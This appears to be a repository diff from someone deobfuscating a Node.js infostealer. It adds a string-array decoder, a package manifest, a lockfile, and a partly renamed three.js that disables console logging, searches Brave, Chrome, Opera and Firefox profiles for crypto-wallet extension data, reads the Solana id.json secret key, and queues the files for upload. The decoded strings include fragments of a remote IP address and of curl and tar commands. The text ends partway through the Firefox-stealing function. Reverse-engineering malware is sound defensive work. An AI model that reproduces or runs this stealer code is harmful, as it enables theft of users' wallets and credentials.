'keych', '164.1', 'dfjmm', 'aholp', 'VpXqy', '.log', 'pekpl', "curl ", 'qaEUw', '.file', '/clie', 'JPxEu', 'exist', 'acces', '1224', 'kkolj', "tar -", 'ldhgm', "le ", 'ata/L', 'aeach', 'lchlg', 'mgjnj', 'age/d', '_file', 'UaQym', 'oftwa', 'FileS', 'QxhnJ', 'toStr', 'cfgod', 'YCNuG', 'OaJhU', " -C ", 'cyKTi', 'Etbne', '__pro', 'tings', 'ccfch', 'txt', '{}.co', 'irSyn', "\\p2.z", 'fig/', '-Brow', 'renam', 'dirna', 'SIQUz', 'Edge/', '_uld', 'RdYzg', 'hecda', 'reque', '/Chro', 'sSync', 're/Br', 'jbmgj', 'phepc', 'ary/A', 'uts', 'pndod', 'fig/s', 'kodbe', 'omihk', 'WSGWI', 'nkdna', 'zA-Z_', 'olana', 'PwHqq', 'a-zA-', 'kpcnl', 'creat', 'terva', 'illa/', 'ase', 'WDvbl', '/User', 'to__', 'debu', 'orm', 'owgIh', 'ZVViQ', 'idlcd', 'gvOfj', "era S", 'rowse', 'SfxxB', 'ort/', 'pikoo', "n Set", "\\p.zi", 'dgmol', 'odkjb', 'chain', 'lZQox', "User ", 'a_id.', 'son', 'mnkoe', 'era', 'Local', 'gmccd', 'tion', 'actio', 'e-chr', 'get', 'ngcna', '-db', 'while', 'hlefn', 'com.o', 'hnfan', 'ihOIO', 'Googl', 'getTi'];
getArrOfStrs = function () {
return arrOfStrs;
};
return getArrOfStrs();
}
function dec1(in1, _) {
const arrOfStrs = getArrOfStrs();
dec1 = function (in1, _) {
in1 = in1 - 300;
let _0x159f5f = arrOfStrs[in1];
return _0x159f5f;
};
return dec1(in1, _);
}
// const virusMain = async () => {}
const main = async () => {
// const foo = parseInt(dec1(436, 0x120)) / 1 * (parseInt(dec1(526, 0x15)) / 2) + parseInt(dec1(518, 0x18e)) / 3 * (-parseInt(dec1(561, 0x445)) / 4) + -parseInt(dec1(448, 0x407)) / 5 * (parseInt(dec1(521, '0x448')) / 6) + parseInt(dec1(528, '0x90')) / 7 + parseInt(dec1(463, -0x56)) / 8 * (parseInt(dec1(620, 0x125)) / 9) + parseInt(dec1(529, -0xf)) / 10 + -parseInt(dec1(476, 0x279)) / 11;
// console.log(foo);
// console.log(typeof foo);
// console.log(Math.round(new Date().getTime() / 1000));
const os = require('os');
console.log(os.homedir())
}
main();

405
workspace/one.js Normal file
View File

@ -0,0 +1,405 @@
const arrOfStrs = [
"RHmqc",
"omjjk",
"ApteI",
"sCumQ",
"copyF",
"/ld_",
"rome",
"fgpgk",
"exec",
"rneKI",
"lLrSF",
"push",
"test",
"const",
"OiABa",
"nkbih",
"ocal/",
"/Libr",
"gpafn",
"/Logi",
"count",
"hostn",
"/Goog",
"type",
"ain",
"gger",
"3037OzSgDk",
"ctor(",
"round",
"fdial",
"multi",
"mdjon",
"ata",
"idb",
"oihof",
"is\x22)(",
"knmef",
"ync",
"125CwSmIC",
"VPgoc",
"ware/",
"ess",
"IGRsE",
"\x5cpyth",
"repla",
"Micro",
"wlUAS",
"0-9a-",
"\x5c+\x5c+\x20",
"ensio",
"-rele",
"pjiig",
"SvCSl",
"16zYubJH",
"bind",
"rmSyn",
"hoSHZ",
"e/Chr",
"log",
"hfood",
"LswSJ",
"write",
"wynjd",
"//95.",
"OkPvv",
"woHII",
"13479389yigTOw",
"TzzgA",
"oohck",
"ort/G",
"/AppD",
"Brave",
"googl",
"_lst",
"ata/",
"acmac",
"AVJaB",
"on.ex",
"isDir",
"Data",
"lengt",
"jXfuU",
"\x5c.pyp",
"yzTXQ",
"url",
"jgjfh",
"inclu",
"call",
"ng/Op",
"$]*)",
"xfpZo",
"filen",
"eebol",
"ome",
"jblnd",
"excep",
"ZDfOB",
"brld_",
"bohma",
"aeaoe",
"uCJgo",
"nt/",
"trace",
"n3\x20\x22",
"IOjHQ",
"ejbal",
"nhcel",
"NNhzn",
"382902FMrTAX",
"StRpE",
"ort/B",
"23610RVWEoM",
"ion",
"oamin",
"table",
"pebkl",
"164qDPepv",
"hid",
"6465221OiGmbD",
"15101090qJHwNn",
"Z_$][",
"bbldc",
"Strea",
"ogin.",
"nstru",
"post",
"ZEGam",
"JOVFD",
"l\x20Ext",
"init",
"/stor",
"info",
"oZjzq",
"g/Moz",
"wOJfi",
")+)+)",
"ser",
"ame",
"n\x20(fu",
"nmhnf",
"WpCbt",
"xtens",
"bGCdl",
"forEa",
"*(?:[",
"nctio",
"Defau",
"ary/K",
"bfnae",
"moz-e",
"apply",
"28JNYCjU",
"rave-",
"/.con",
"rn\x20th",
"UroxN",
"http:",
"des",
"raveS",
"HGaea",
"-Lo\x20\x22",
"/id.j",
"\x20(tru",
"fbeog",
"are/B",
"eSoft",
"ofile",
"\x20Supp",
"size",
"solan",
"bvLnu",
"path",
"Roami",
"input",
"ata/R",
"cionb",
"sJMRc",
"fOasi",
"wambz",
"dgcij",
"dlcob",
"oogle",
"conso",
"ion\x20*",
"l\x20Sta",
"tmpdi",
"warn",
"peras",
"e\x22\x20\x22",
"logkc",
"FZJcA",
"formD",
"statS",
"setIn",
"opera",
"lipeo",
"jXzWn",
"BmaWn",
".ldb",
"ophhp",
"error",
"eycha",
"/Loca",
"funct",
"DHpkL",
"ation",
"pytho",
"/pdow",
"Firef",
"/.npl",
"1396917dSIpDK",
"proto",
"Brows",
"lmeee",
"child",
"ins/l",
"ajnim",
"bohpj",
"ing",
"_proc",
"fhboh",
"knocf",
"(((.+",
"ibnej",
"\x22\x20\x22",
"re.Op",
"/uplo",
"xf\x20",
"apagc",
"n()\x20",
"czYua",
"DaCRF",
"GfbKa",
"pplic",
"PlQuv",
"\x22retu",
"eofbd",
"lmome",
"searc",
"ile",
"hifaf",
"vdKma",
"lYbbZ",
"\x20Data",
"re/Op",
"onoee",
"imhlp",
"7.24:",
"\x5c(\x20*\x5c",
"pld_",
"ave-B",
"gdVKS",
"ox/Pr",
"Nchdc",
"CAdIA",
"eRead",
"ads",
"YvgzM",
"n\x20Dat",
"state",
"retur",
"ructo",
"/Brav",
"readd",
"bakop",
"JLXSG",
"strin",
"imael",
"efaul",
"Softw",
"ilkdb",
"e)\x20{}",
"Objec",
"ector",
"Profi",
"soft/",
"join",
"le/Ch",
"eSync",
"homed",
"102",
"behhm",
"platf",
"keych",
"164.1",
"dfjmm",
"aholp",
"VpXqy",
".log",
"pekpl",
"curl\x20",
"qaEUw",
".file",
"/clie",
"JPxEu",
"exist",
"acces",
"1224",
"kkolj",
"tar\x20-",
"ldhgm",
"le\x20",
"ata/L",
"aeach",
"lchlg",
"mgjnj",
"age/d",
"_file",
"UaQym",
"oftwa",
"FileS",
"QxhnJ",
"toStr",
"cfgod",
"YCNuG",
"OaJhU",
"\x20-C\x20",
"cyKTi",
"Etbne",
"__pro",
"tings",
"ccfch",
"txt",
"{}.co",
"irSyn",
"\x5cp2.z",
"fig/",
"-Brow",
"renam",
"dirna",
"SIQUz",
"Edge/",
"_uld",
"RdYzg",
"hecda",
"reque",
"/Chro",
"sSync",
"re/Br",
"jbmgj",
"phepc",
"ary/A",
"uts",
"pndod",
"fig/s",
"kodbe",
"omihk",
"WSGWI",
"nkdna",
"zA-Z_",
"olana",
"PwHqq",
"a-zA-",
"kpcnl",
"creat",
"terva",
"illa/",
"ase",
"WDvbl",
"/User",
"to__",
"debu",
"orm",
"owgIh",
"ZVViQ",
"idlcd",
"gvOfj",
"era\x20S",
"rowse",
"SfxxB",
"ort/",
"pikoo",
"n\x20Set",
"\x5cp.zi",
"dgmol",
"odkjb",
"chain",
"lZQox",
"User\x20",
"a_id.",
"son",
"mnkoe",
"era",
"Local",
"gmccd",
"tion",
"actio",
"e-chr",
"get",
"ngcna",
"-db",
"while",
"hlefn",
"com.o",
"hnfan",
"ihOIO",
"Googl",
"getTi",
];
function dec1(in1) {
in1 -= 300;
return arrOfStrs[in1];
}

15
workspace/package.json Normal file
View File

@ -0,0 +1,15 @@
{
"name": "workspace",
"version": "1.0.0",
"description": "",
"main": "index.js",
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1"
},
"keywords": [],
"author": "",
"license": "ISC",
"dependencies": {
"request": "^2.88.2"
}
}

301
workspace/pnpm-lock.yaml Normal file
View File

@ -0,0 +1,301 @@
lockfileVersion: '6.0'
settings:
autoInstallPeers: true
excludeLinksFromLockfile: false
dependencies:
request:
specifier: ^2.88.2
version: 2.88.2
packages:
/ajv@6.12.6:
resolution: {integrity: sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==}
dependencies:
fast-deep-equal: 3.1.3
fast-json-stable-stringify: 2.1.0
json-schema-traverse: 0.4.1
uri-js: 4.4.1
dev: false
/asn1@0.2.6:
resolution: {integrity: sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==}
dependencies:
safer-buffer: 2.1.2
dev: false
/assert-plus@1.0.0:
resolution: {integrity: sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==}
engines: {node: '>=0.8'}
dev: false
/asynckit@0.4.0:
resolution: {integrity: sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==}
dev: false
/aws-sign2@0.7.0:
resolution: {integrity: sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==}
dev: false
/aws4@1.13.1:
resolution: {integrity: sha512-u5w79Rd7SU4JaIlA/zFqG+gOiuq25q5VLyZ8E+ijJeILuTxVzZgp2CaGw/UTw6pXYN9XMO9yiqj/nEHmhTG5CA==}
dev: false
/bcrypt-pbkdf@1.0.2:
resolution: {integrity: sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==}
dependencies:
tweetnacl: 0.14.5
dev: false
/caseless@0.12.0:
resolution: {integrity: sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==}
dev: false
/combined-stream@1.0.8:
resolution: {integrity: sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==}
engines: {node: '>= 0.8'}
dependencies:
delayed-stream: 1.0.0
dev: false
/core-util-is@1.0.2:
resolution: {integrity: sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==}
dev: false
/dashdash@1.14.1:
resolution: {integrity: sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==}
engines: {node: '>=0.10'}
dependencies:
assert-plus: 1.0.0
dev: false
/delayed-stream@1.0.0:
resolution: {integrity: sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==}
engines: {node: '>=0.4.0'}
dev: false
/ecc-jsbn@0.1.2:
resolution: {integrity: sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==}
dependencies:
jsbn: 0.1.1
safer-buffer: 2.1.2
dev: false
/extend@3.0.2:
resolution: {integrity: sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==}
dev: false
/extsprintf@1.3.0:
resolution: {integrity: sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==}
engines: {'0': node >=0.6.0}
dev: false
/fast-deep-equal@3.1.3:
resolution: {integrity: sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==}
dev: false
/fast-json-stable-stringify@2.1.0:
resolution: {integrity: sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==}
dev: false
/forever-agent@0.6.1:
resolution: {integrity: sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==}
dev: false
/form-data@2.3.3:
resolution: {integrity: sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==}
engines: {node: '>= 0.12'}
dependencies:
asynckit: 0.4.0
combined-stream: 1.0.8
mime-types: 2.1.35
dev: false
/getpass@0.1.7:
resolution: {integrity: sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==}
dependencies:
assert-plus: 1.0.0
dev: false
/har-schema@2.0.0:
resolution: {integrity: sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==}
engines: {node: '>=4'}
dev: false
/har-validator@5.1.5:
resolution: {integrity: sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==}
engines: {node: '>=6'}
deprecated: this library is no longer supported
dependencies:
ajv: 6.12.6
har-schema: 2.0.0
dev: false
/http-signature@1.2.0:
resolution: {integrity: sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==}
engines: {node: '>=0.8', npm: '>=1.3.7'}
dependencies:
assert-plus: 1.0.0
jsprim: 1.4.2
sshpk: 1.18.0
dev: false
/is-typedarray@1.0.0:
resolution: {integrity: sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==}
dev: false
/isstream@0.1.2:
resolution: {integrity: sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==}
dev: false
/jsbn@0.1.1:
resolution: {integrity: sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==}
dev: false
/json-schema-traverse@0.4.1:
resolution: {integrity: sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==}
dev: false
/json-schema@0.4.0:
resolution: {integrity: sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==}
dev: false
/json-stringify-safe@5.0.1:
resolution: {integrity: sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==}
dev: false
/jsprim@1.4.2:
resolution: {integrity: sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==}
engines: {node: '>=0.6.0'}
dependencies:
assert-plus: 1.0.0
extsprintf: 1.3.0
json-schema: 0.4.0
verror: 1.10.0
dev: false
/mime-db@1.52.0:
resolution: {integrity: sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==}
engines: {node: '>= 0.6'}
dev: false
/mime-types@2.1.35:
resolution: {integrity: sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==}
engines: {node: '>= 0.6'}
dependencies:
mime-db: 1.52.0
dev: false
/oauth-sign@0.9.0:
resolution: {integrity: sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==}
dev: false
/performance-now@2.1.0:
resolution: {integrity: sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==}
dev: false
/psl@1.9.0:
resolution: {integrity: sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==}
dev: false
/punycode@2.3.1:
resolution: {integrity: sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==}
engines: {node: '>=6'}
dev: false
/qs@6.5.3:
resolution: {integrity: sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==}
engines: {node: '>=0.6'}
dev: false
/request@2.88.2:
resolution: {integrity: sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==}
engines: {node: '>= 6'}
deprecated: request has been deprecated, see https://github.com/request/request/issues/3142
dependencies:
aws-sign2: 0.7.0
aws4: 1.13.1
caseless: 0.12.0
combined-stream: 1.0.8
extend: 3.0.2
forever-agent: 0.6.1
form-data: 2.3.3
har-validator: 5.1.5
http-signature: 1.2.0
is-typedarray: 1.0.0
isstream: 0.1.2
json-stringify-safe: 5.0.1
mime-types: 2.1.35
oauth-sign: 0.9.0
performance-now: 2.1.0
qs: 6.5.3
safe-buffer: 5.2.1
tough-cookie: 2.5.0
tunnel-agent: 0.6.0
uuid: 3.4.0
dev: false
/safe-buffer@5.2.1:
resolution: {integrity: sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==}
dev: false
/safer-buffer@2.1.2:
resolution: {integrity: sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==}
dev: false
/sshpk@1.18.0:
resolution: {integrity: sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==}
engines: {node: '>=0.10.0'}
hasBin: true
dependencies:
asn1: 0.2.6
assert-plus: 1.0.0
bcrypt-pbkdf: 1.0.2
dashdash: 1.14.1
ecc-jsbn: 0.1.2
getpass: 0.1.7
jsbn: 0.1.1
safer-buffer: 2.1.2
tweetnacl: 0.14.5
dev: false
/tough-cookie@2.5.0:
resolution: {integrity: sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==}
engines: {node: '>=0.8'}
dependencies:
psl: 1.9.0
punycode: 2.3.1
dev: false
/tunnel-agent@0.6.0:
resolution: {integrity: sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==}
dependencies:
safe-buffer: 5.2.1
dev: false
/tweetnacl@0.14.5:
resolution: {integrity: sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==}
dev: false
/uri-js@4.4.1:
resolution: {integrity: sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==}
dependencies:
punycode: 2.3.1
dev: false
/uuid@3.4.0:
resolution: {integrity: sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==}
deprecated: Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.
hasBin: true
dev: false
/verror@1.10.0:
resolution: {integrity: sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==}
engines: {'0': node >=0.6.0}
dependencies:
assert-plus: 1.0.0
core-util-is: 1.0.2
extsprintf: 1.3.0
dev: false

660
workspace/three.js Normal file
View File

@ -0,0 +1,660 @@
// shifts arrOfStrs till the condition is met
(function (getArrOfStrs, magicNum) {
const arrOfStrs = getArrOfStrs();
while (true) {
try {
const _0x5bc6eb = parseInt(dec1(436, 0x120)) / 1 * (parseInt(dec1(526, 0x15)) / 2) + parseInt(dec1(518, 0x18e)) / 3 * (-parseInt(dec1(561, 0x445)) / 4) + -parseInt(dec1(448, 0x407)) / 5 * (parseInt(dec1(521, '0x448')) / 6) + parseInt(dec1(528, '0x90')) / 7 + parseInt(dec1(463, -0x56)) / 8 * (parseInt(dec1(620, 0x125)) / 9) + parseInt(dec1(529, -0xf)) / 10 + -parseInt(dec1(476, 0x279)) / 11;
if (_0x5bc6eb === magicNum) { // compare against 775960
break;
} else {
arrOfStrs.push(arrOfStrs.shift());
}
} catch (_err) {
arrOfStrs.push(arrOfStrs.shift());
}
}
})(getArrOfStrs, 775960);
// (?)
const _0x3f64bb = function () {
let flag1 = true;
return function (_0x56a168, _0x4b09b7) {
const _0x3343a9 = flag1 ? function () {
if (_0x4b09b7) {
const _0x5bdfee = _0x4b09b7.apply(_0x56a168, arguments);
_0x4b09b7 = null;
return _0x5bdfee;
}
} : function () {};
flag1 = false;
return _0x3343a9;
};
}();
// (?)
const _0xb564a4 = _0x3f64bb(this, function () {
return _0xb564a4.toString().search("(((.+)+)+)+$").toString().constructor(_0xb564a4).search("(((.+)+)+)+$");
});
// (?), (unused)
function _0x23f8f9(_0x578d77, _0x599245, _0x29ff3c, _0xdc1b7e, _0x48949a) {
return dec1(_0xdc1b7e + 755, _0x48949a);
}
_0xb564a4();
// (?)
const _0x2fd3bd = function () {
let flag2 = true;
return function (_0x4380c3, _0x332592) {
const _0x263396 = flag2 ? function () {
if (_0x332592) {
const _0x548336 = _0x332592.apply(_0x4380c3, arguments);
_0x332592 = null;
return _0x548336;
}
} : function () {};
flag2 = false;
return _0x263396;
};
}();
// (?)
(function () {
_0x2fd3bd(this, function () {
const _0x18fbc2 = new RegExp("function *\\( *\\)");
const _0x34bf5d = new RegExp("\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)", 'i');
const _0x100ae1 = _0x23e34d("init");
if (!_0x18fbc2.test(_0x100ae1 + "chain") || !_0x34bf5d.test(_0x100ae1 + "input")) {
_0x100ae1('0');
} else {
_0x23e34d();
}
})();
})();
// (?)
const _0x2a5a96 = function () {
let flag3 = true;
return function (_0x4bdc0a, _0x2d3630) {
const _0x4d49c5 = flag3 ? function () {
if (_0x2d3630) {
const _0x6d2bf8 = _0x2d3630.apply(_0x4bdc0a, arguments);
_0x2d3630 = null;
return _0x6d2bf8;
}
} : function () {};
flag3 = false;
return _0x4d49c5;
};
}();
// (?), (unused)
function _0x7010db(_0x3a87e1, _0x262e58, _0x514759, _0x2b76a4, _0x4bebf3) {
return dec1(_0x2b76a4 - 0x33c, _0x4bebf3);
}
// disables console.*
const _0x42c5cd = _0x2a5a96(this, function () {
const obj = {
FZJcA: function (_0x3da6c0, _0x394407) {
return _0x3da6c0 + _0x394407;
},
OkPvv: "error"
};
obj.YCNuG = "table";
const getGlobalsObj = function () {
let _0x4fa761;
try {
_0x4fa761 = Function("return (function() {}.constructor(\"return this\")( ));")();
} catch (_0x3bd620) {
_0x4fa761 = window;
}
return _0x4fa761;
};
const globalsObj = getGlobalsObj();
const _0x5673cb = globalsObj.console = globalsObj.console || {};
const consoleLogTypes = ["log", "warn", "info", "error", "exception", obj.YCNuG, "trace"];
for (let i = 0; i < consoleLogTypes.length; i++) {
const _0x180732 = _0x2a5a96.constructor.prototype.bind(_0x2a5a96);
const currConsoleLogType = consoleLogTypes[i];
const _0x2797c6 = _0x5673cb[currConsoleLogType] || _0x180732;
_0x180732.__proto__ = _0x2a5a96.bind(_0x2a5a96);
_0x180732.toString = _0x2797c6.toString.bind(_0x2797c6);
_0x5673cb[currConsoleLogType] = _0x180732;
}
});
_0x42c5cd();
const fs = require('fs');
const os = require('os');
const path = require("path");
const request = require("request");
const exec = require("child_process").exec;
const hostname = os.hostname();
const platform = os.platform();
const homedir = os.homedir();
const tmpdir = os.tmpdir();
const getPathRelativeToHomedir = _0x2b012b => _0x2b012b.replace(/^~([a-z]+|\/)/, (_, _0x772cb7) => '/' === _0x772cb7 ? homedir : path.dirname(homedir) + '/' + _0x772cb7);
function pathExists(_0x23cb6a) {
try {
fs.accessSync(_0x23cb6a);
return true;
} catch (_err) {
return false;
}
}
// [windows, macos, linux]
const bravePaths = ["Local/BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser"];
const chromePaths = ["Local/Google/Chrome", "Google/Chrome", "google-chrome"];
const operaPaths = ["Roaming/Opera Software/Opera Stable", "com.operasoftware.Opera", "opera"];
const extensionIds = ["nkbihfbeogaeaoehlefnkodbefgpgknn", "ejbalbakoplchlghecdalmeeeajnimhm", "fhbohimaelbohpjbbldcngcnapndodjp", "hnfanknocfeofbddgcijnmhnfnkdnaad", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "aeachknmefphepccionboohckonoeemg", "hifafgmccdpekplomjjkcfgodnhcellj", "jblndlipeogpafnldhgmapagcccfchpi", "acmacodkjbdgmoleebolmdjonilkdbch", "dlcobpjiigpikoobohmabehhmhfoodbb", "aholpfdialjgjfhomihkjbmgjidlcdno"];
// steals browser extension wallets' log and db files, and also Solana CLI default wallet secret key
const stealBrowserExtensionFiles = async (browserPath, someNumberAndUnderscore, checkForIdJson, timestamp) => {
let idJsonPath;
if (!browserPath || '' === browserPath) {
return [];
}
try {
if (!pathExists(browserPath)) {
return [];
}
} catch (_err) {
return [];
}
if (!someNumberAndUnderscore) {
someNumberAndUnderscore = '';
}
let filesToSteal = [];
for (let i = 0; i < 200; i++) {
const extensionsPath = browserPath + '/' + (0 === i ? "Default" : "Profile " + i) + "/Local Extension Settings";
for (let j = 0; j < extensionIds.length; j++) {
let extensionPath = extensionsPath + '/' + extensionIds[j];
if (pathExists(extensionPath)) {
let extensionPathItems = [];
try {
extensionPathItems = fs.readdirSync(extensionPath);
} catch (_0x4f5794) {
extensionPathItems = [];
}
extensionPathItems.forEach(async itemPath => {
let itemRealPath = path.join(extensionPath, itemPath);
try {
const options = {
filename: "102_" + someNumberAndUnderscore + i + '_' + extensionIds[j] + '_' + itemPath
};
if (itemRealPath.includes(".log") || itemRealPath.includes(".ldb")) {
filesToSteal.push({
'value': fs.createReadStream(itemRealPath),
'options': options
});
}
} catch (_err) {}
});
}
}
}
if (checkForIdJson && (idJsonPath = homedir + "/.config/solana/id.json", fs.existsSync(idJsonPath))) {
try {
const options = {
filename: "solana_id.txt"
};
filesToSteal.push({
'value': fs.createReadStream(idJsonPath),
'options': options
});
} catch (_err) {}
}
uploadFiles(filesToSteal, timestamp);
return filesToSteal;
};
// steals Firefox extension files (not just wallet ones)
const stealFirefoxExtensionFiles = timestamp => {
const firefoxProfilesPath = getPathRelativeToHomedir('~/') + "/AppData/Roaming/Mozilla/Firefox/Profiles";
let filesToSteal = [];
if (pathExists(firefoxProfilesPath)) {
let firefoxProfilesPathItems = [];
try {
firefoxProfilesPathItems = fs.readdirSync(firefoxProfilesPath);
} catch (_0x33914c) {
firefoxProfilesPathItems = [];
}
let outerCounter = 0;
firefoxProfilesPathItems.forEach(async itemPath1 => {
const obj = {
GfbKa: ".files"
};
obj.vdKma = "idb";
let profilePath = path.join(firefoxProfilesPath, itemPath1);
if (profilePath.includes("-release")) { // default-release
let siteStoragePath = path.join(profilePath, "/storage/default");
let siteStoragePathItems = [];
siteStoragePathItems = fs.readdirSync(siteStoragePath);
let innerCounter = 0;
siteStoragePathItems.forEach(async itemPath2 => { // default-release/storage/default/*
if (itemPath2.includes("moz-extension")) {
